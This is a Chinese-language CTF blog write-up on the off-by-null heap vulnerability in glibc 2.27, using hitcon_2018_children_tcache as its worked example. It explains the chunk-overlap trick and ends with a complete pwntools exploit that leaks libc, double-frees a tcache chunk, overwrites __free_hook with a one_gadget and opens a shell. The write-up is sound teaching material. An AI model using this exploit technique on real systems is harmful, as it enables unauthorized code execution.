

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="WangYiHao">
  <meta name="keywords" content="">
  
    <meta name="description" content="堆漏洞之-off-by-null  测试环境：  Ubuntu 18.04，glibc2.27 漏洞利用介绍：  这里呢，我们简单的解释一下 ，off-by-null 这个漏洞，这个漏洞的含义就是指溢出一个null字节，就是”\x00”，这个溢出的字节威力巨大，常常可以导致我们更改到下一块chunk的大小，从而使free函数在执行的时候，错误释放chunk的大小。 关于off-by-one的一种利">
<meta property="og:type" content="article">
<meta property="og:title" content="堆漏洞之-off-by-null">
<meta property="og:url" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/index.html">
<meta property="og:site_name" content="pwn二进制初研究">
<meta property="og:description" content="堆漏洞之-off-by-null  测试环境：  Ubuntu 18.04，glibc2.27 漏洞利用介绍：  这里呢，我们简单的解释一下 ，off-by-null 这个漏洞，这个漏洞的含义就是指溢出一个null字节，就是”\x00”，这个溢出的字节威力巨大，常常可以导致我们更改到下一块chunk的大小，从而使free函数在执行的时候，错误释放chunk的大小。 关于off-by-one的一种利">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/1.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/2.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/blog/source_posts/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/3.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/4.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/5.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/6.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/7.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/8.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/9.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/10.png">
<meta property="og:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/11.png">
<meta property="article:published_time" content="2024-09-03T11:12:58.000Z">
<meta property="article:modified_time" content="2024-09-06T12:17:20.970Z">
<meta property="article:author" content="WangYiHao">
<meta property="article:tag" content="堆漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/1.png">
  
  
  
  <title>堆漏洞之-off-by-null - pwn二进制初研究</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>pwn浅研</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="堆漏洞之-off-by-null"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-03 19:12" pubdate>
          2024年9月3日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          11 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">堆漏洞之-off-by-null</h1>
            
            
              <div class="markdown-body">
                
                <h1 align="center">堆漏洞之-off-by-null</h1>

<h2>测试环境：</h2>

<p>Ubuntu 18.04，glibc2.27</p>
<h2>漏洞利用介绍：</h2>

<p>这里呢，我们简单的解释一下 ，off-by-null 这个漏洞，这个漏洞的含义就是指溢出一个null字节，就是”\x00”，这个溢出的字节威力巨大，常常可以导致我们更改到下一块chunk的大小，从而使free函数在执行的时候，错误释放chunk的大小。</p>
<p>关于off-by-one的一种利用方法，我已经详细的在<a target="_blank" rel="noopener" href="https://sunrtwang.github.io/2024/08/29/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-Shrink-the-chunk/#%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-shrink-the-chunk">堆漏洞之-Shrink the chunk</a>这里进行了介绍，这里我们来介绍它的另一种姿势，也是我刚刚学习的，话不多说，我们开始：</p>
<p>首先呢，我们先申请四块chunk，注意，这四块chunk是有要求的，特别是第一块和第三块，它的要求呢，是free掉的时候不能进入fastbin或是tcachebin中，也就是意味着，我们第一块和第三块的申请大小，必须超过0x410，最后一块chunk的作用是防止和Topchunk的合并，而第二块chunk的作用，是为了溢出一个字节至第三个chunk的size区域，所以呢，第二块chunk的大小也就有了隐形的要求，也就是要以0x8结尾，这样才能启动prive_size的复用，溢出到第三个chunk的size区域，使其prev_inuse位为0。</p>
<h2>图解漏洞利用：</h2>

<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<h2>例题讲解：</h2>

<p><a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#hitcon_2018_children_tcache">hitcon_2018_children_tcache</a></p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>可以看到，保护全部开启，也就说我们不能写入got表了，只能写入hook表了，接下来我们来看看，造成漏洞的函数：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/blog\source_posts\堆漏洞之-off-by-null\3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>strcpy函数，会对字符串进行”\x00”的截断，也就是说，如果我们传入的字符如果是下图：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>那么，如此：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<p>只有四个A被传入，被00截断了，那如果我们只传入四个A呢，事实上，当我们传入四个A时，strcpy函数会在我们传入的四个A后面加上”\x00”来截断字符串，所以说，存在off-bu-one漏洞，只要我们写满能写的字节，就会溢出一个”\x00”，我们先申请四个堆块：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>然后释放前两个，因为没有编辑函数，所以释放第二个chunk，再次申请以用来编辑，由于我们free前，程序就会将data区域填满0xda，所以我们得重复申请释放来清理掉第三块chunk的prev_size区域并溢出一个字节到size域：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>第一次循环，将会覆盖到0x501的最后一个字节，使其变为0x500，因为strcpy函数多加一个”\x00”的缘故，循环函数如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python3">for i in  range(9):<br>    addHeap(0x38-i,&quot;d&quot;*(0x38-i))<br>    deleteHeap(0)<br></code></pre></td></tr></table></figure>

<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/8.png" srcset="/img/loading.gif" lazyload alt="8"></p>
<p>直到循环清空了prve_size域，这时，循环函数的使命便完成了，然后，我们再次申请0x38个字节的chunk，因为没有编辑函数，我们不得不这样做，申请的时候写入数据到下一个chunk的prve_size，使其等于前两个堆块的大小：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/9.png" srcset="/img/loading.gif" lazyload alt="9"></p>
<p>这样，我们释放第三个chunk，此时便可以合并了，将第二块chunk一并合并了，此时，第二块chunk就处于释放与没释放的叠加状态：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/10.png" srcset="/img/loading.gif" lazyload alt="10"></p>
<p>然后，根据第一块堆泄露libc基地址，然后再次申请0x420，将第一块申请出来，再次申请0x50，这个将是处于释放和未释放的叠加态的chunk（从unsortedbin 切割），那么这两块chunk，其实都是同一个区域，接下来我们来Double free（注：这里的libc是比较旧的，新版本libc中加入了对tcache bins的检查，Double free变困难了），直接Double free，然后指向free_hook，写入one_gadget，为啥不能&#x2F;bin&#x2F;sh呢，因为free前，会将chunk的数据区域写入0xda，会污染我们写入的&#x2F;bin&#x2F;sh：</p>
<p><img src="/2024/09/03/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-off-by-null/11.png" srcset="/img/loading.gif" lazyload alt="11"></p>
<p>最终的payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#context.log_level = &#x27;debug&#x27;</span><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.terminal = [<span class="hljs-string">&#x27;tmux&#x27;</span>, <span class="hljs-string">&#x27;splitw&#x27;</span>, <span class="hljs-string">&#x27;-h&#x27;</span>]<br><br><span class="hljs-comment">#libc_path = &quot;libc-2.27.so&quot;</span><br><br><span class="hljs-comment">#sh = process(&quot;./HITCON_2018_children_tcache&quot;,env=&#123;&#x27;LD_PRELOAD&#x27;: libc_path&#125;)</span><br>sh = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26126</span>)<br><span class="hljs-comment">#elf = ELF(&quot;./HITCON_2018_children_tcache&quot;)</span><br>libc = ELF(<span class="hljs-string">&quot;./libc-2.27.so&quot;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">addHeap</span>(<span class="hljs-params">size, data</span>):<br>    sh.recvuntil(<span class="hljs-string">&quot;Your choice: &quot;</span>)<br>    sh.sendline(<span class="hljs-string">&quot;1&quot;</span>)<br>    sh.recvuntil(<span class="hljs-string">&quot;Size:&quot;</span>)<br>    sh.sendline(<span class="hljs-built_in">str</span>(size))<br>    sh.recvuntil(<span class="hljs-string">&quot;Data:&quot;</span>)<br>    sh.sendline(data)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">showHeap</span>(<span class="hljs-params">index</span>):<br>    sh.recvuntil(<span class="hljs-string">&quot;Your choice: &quot;</span>)<br>    sh.sendline(<span class="hljs-string">&quot;2&quot;</span>)<br>    sh.recvuntil(<span class="hljs-string">&quot;Index:&quot;</span>)<br>    sh.sendline(<span class="hljs-built_in">str</span>(index))<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">deleteHeap</span>(<span class="hljs-params">index</span>):<br>    sh.recvuntil(<span class="hljs-string">&quot;Your choice: &quot;</span>)<br>    sh.sendline(<span class="hljs-string">&quot;3&quot;</span>)<br>    sh.recvuntil(<span class="hljs-string">&quot;Index:&quot;</span>)<br>    sh.sendline(<span class="hljs-built_in">str</span>(index))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">showHeapAdcv</span>(<span class="hljs-params">index</span>):<br>    sh.recvuntil(<span class="hljs-string">&quot;Your choice: &quot;</span>)<br>    sh.sendline(<span class="hljs-string">&quot;2&quot;</span>)<br>    sh.recv()<br>    <span class="hljs-comment">#sh.recvuntil(&quot;Index:&quot;)</span><br>    sh.sendline(<span class="hljs-built_in">str</span>(index))<br>    mern_addr = u64(sh.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&quot;\x00&quot;</span>))<br>    <span class="hljs-keyword">return</span> mern_addr<br><br><br>addHeap(<span class="hljs-number">0x420</span>,<span class="hljs-string">&quot;A&quot;</span>) <span class="hljs-comment"># 0</span><br>addHeap(<span class="hljs-number">0x38</span>,<span class="hljs-string">&quot;d&quot;</span>) <span class="hljs-comment"># 1</span><br>addHeap(<span class="hljs-number">0x4f0</span>,<span class="hljs-string">&quot;A&quot;</span>) <span class="hljs-comment"># 2</span><br>addHeap(<span class="hljs-number">0x30</span>,<span class="hljs-string">&quot;d&quot;</span>) <span class="hljs-comment"># 3</span><br><br><br>deleteHeap(<span class="hljs-number">0</span>)<br>deleteHeap(<span class="hljs-number">1</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span>  <span class="hljs-built_in">range</span>(<span class="hljs-number">9</span>):<br>    addHeap(<span class="hljs-number">0x38</span>-i,<span class="hljs-string">&quot;d&quot;</span>*(<span class="hljs-number">0x38</span>-i))<br>    deleteHeap(<span class="hljs-number">0</span>)<br><br>addHeap(<span class="hljs-number">0x38</span>,<span class="hljs-string">&#x27;A&#x27;</span>*(<span class="hljs-number">0x30</span>) + <span class="hljs-string">&quot;\x70\x04&quot;</span> ) <span class="hljs-comment"># 0</span><br><br>deleteHeap(<span class="hljs-number">2</span>)<br><br>addHeap(<span class="hljs-number">0x420</span>,<span class="hljs-string">&quot;A&quot;</span>) <span class="hljs-comment"># 1</span><br><br>mern_addr = showHeapAdcv(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;mern_addr--------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(mern_addr))<br><br>libc_addr = mern_addr - <span class="hljs-number">0x3ebca0</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;libc_addr--------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(libc_addr))<br><br>free_hook_addr = libc_addr + <span class="hljs-number">0x3ed8e8</span><br>system_addr = libc_addr + <span class="hljs-number">0x4f420</span><br><br>free_hook_addr = libc_addr + libc.symbols[<span class="hljs-string">&quot;__free_hook&quot;</span>]<br>system_addr = libc_addr + libc.symbols[<span class="hljs-string">&quot;system&quot;</span>]<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;free_hook_addr---&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(free_hook_addr))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;system_addr------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(system_addr))<br>addHeap(<span class="hljs-number">0x50</span>,<span class="hljs-string">&quot;deadbeef&quot;</span>) <span class="hljs-comment"># 2</span><br>deleteHeap(<span class="hljs-number">2</span>)<br><br>deleteHeap(<span class="hljs-number">0</span>)<br>addHeap(<span class="hljs-number">0x50</span>,p64(free_hook_addr)) <span class="hljs-comment"># 0</span><br>addHeap(<span class="hljs-number">0x50</span>,<span class="hljs-string">&quot;/bin/sh\x00&quot;</span>) <span class="hljs-comment"># 2</span><br><br>one_gadget = <span class="hljs-number">0x4f322</span> + libc_addr<br><br>addHeap(<span class="hljs-number">0x50</span>,p64(one_gadget))<br><br><br>deleteHeap(<span class="hljs-number">2</span>)<br><br><br><span class="hljs-comment">#gdb.attach(sh)</span><br>sh.interactive()<br></code></pre></td></tr></table></figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%A0%86%E6%BC%8F%E6%B4%9E/" class="print-no-link">#堆漏洞</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>堆漏洞之-off-by-null</div>
      <div>http://example.com/2024/09/03/堆漏洞之-off-by-null/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>WangYiHao</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年9月3日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/08/29/%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8B-Shrink-the-chunk/" title="堆漏洞之-Shrink the chunk">
                        <span class="hidden-mobile">堆漏洞之-Shrink the chunk</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
